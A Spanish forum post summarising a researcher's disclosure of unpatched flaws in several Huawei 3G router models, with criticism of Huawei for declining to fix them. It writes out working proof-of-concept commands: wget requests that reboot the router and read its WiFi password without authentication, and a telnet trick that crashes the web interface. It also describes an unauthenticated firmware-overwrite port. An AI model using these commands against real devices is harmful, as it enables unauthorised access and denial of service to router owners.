Foro Wifi-libre.com

Múltiples brechas severas y sin arreglos en los routers 3G de Huawei

Fuente:

• A comprehensive study of Huawei 3G routers - XSS, CSRF, DoS, unauthenticated firmware update, RCE de Pierre KIM

  La lista de modelos afectados es bastante consecuente :

• E960      - WLA1GCPU

• E968      - WLA1GCYU

• B970      - WLA1GAPU

• B932      - WLB1TIPU

• B933      - WLB1TIPU

• B220      - WLA1GCYU

• B260      - WLA1GCYU

• B270      - WLA1GCYU

• B972      - WLA1GCYU

• B200-20 - WLB3TILU

• B200-30 - WLB3TILU

• B200-40 - WLB3TILU

• B200-50 - WLB3TILU

• ??         - WLA1GCPU

  Todos llevan el mismo firmware cuya última versión es la 846.11.15.08.115 (20 de febrero 2013)
Un firmware "mal diseñado" según las propias palabras de Pierre KIM quién lo ha podido comprobar en un B260A de Orange en Tunisía.
  Mal asunto para los que han comprado un routers de estos : como la producción parró ea finales 2013, HUawei "se limpia las manos" y anuncia que no habrá arreglo y aconseja comprar un modelo nuevo.
  ¡Gracias Huawei! No dar soporte para material comprado dos años atrás... ¡Sois unos verdaderos caballeros! 
  Seguiremos su consejo y compraremos un router nuevo pero... ¡No será un Huawei!

Huawei pone el listón muy alto en la categoría "mi Router es un virus"

galleta rancia

   Echamos un ojo a algunas de las vulnerabilidades.
Esta es de las buenas: Tan básica y grosera que anuncia la catástrofe que se avecina...
Los credenciales de administrador están gentilmente guardados en texto plano (pasado a base 64 - reversible inmediatamente) en un coockie que un hacker podría leer y o esnifar
Nunca-jamás guardar los credenciales en claro...
Es una regla de oro simple. Resulta difícil concebir como en 2013 un fabricante del tamaño de Huawei cometa este tipo de errores.

Saltarse los credenciales

¿Quieres reiniciar el router sin tener ni idea de los credenciales?
Solo tienes que pedir lo a la interfaz :

wget -qO- --post-data='action=Reboot&page=resetrouter.asp' http://192.168.1.1/en/apply.cgi

Hacemos una petición directa a "apply-cgi" con "POST datas"Reboot&page" y la interfaz se ejecuta. Sin más. No hace falta password.
Del mismo modo podemos obtener la contraseña WiFI (siempre sin tener los credenciales) con

wget -qO- 'http://192.168.1.1/js/wlan_cfg.js'|less

DoS de la interfaz http (web) usando telnet

root@linux:~# telnet 192.168.1.1 80
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
x   
Connection closed by foreign host.
root@linux:~# telnet 192.168.1.1 80
Trying 192.168.1.1...
telnet: Unable to connect to remote host: Connection refused
root@linux:~

Notareis que el truco resida en iniciar una sesión telnet en el puerto 80 que esta reservado el trafico http.
La interfaz web no lo aguanta.

Posibilidad de instalar un firmware diferente sin autenticarse o desbloquear la tarjeta SIM

Con el modelo que el investigador he tenido entre mano , el programa para actualizaciones abre un puerto UDP (el 1280).
Un intruso puede usar este puerto sin autenticarse y sobrescribir  la memoria flash (MTD - el firmware)
Dicho con otras palabras : puede poner un firmware de aspecto igual pero modificado y petado de todo tipos de maldades.

Para acabar este tema les regalo una vuelta del mundo gratis con la lista de ISP afectados (los que usan o han usado un B260A :

Ninguna agencia de vaije tiene una lista de destinos comparable a esta... Da a pensar que  los de Huawei son más unos expertos en turismo que en seguridad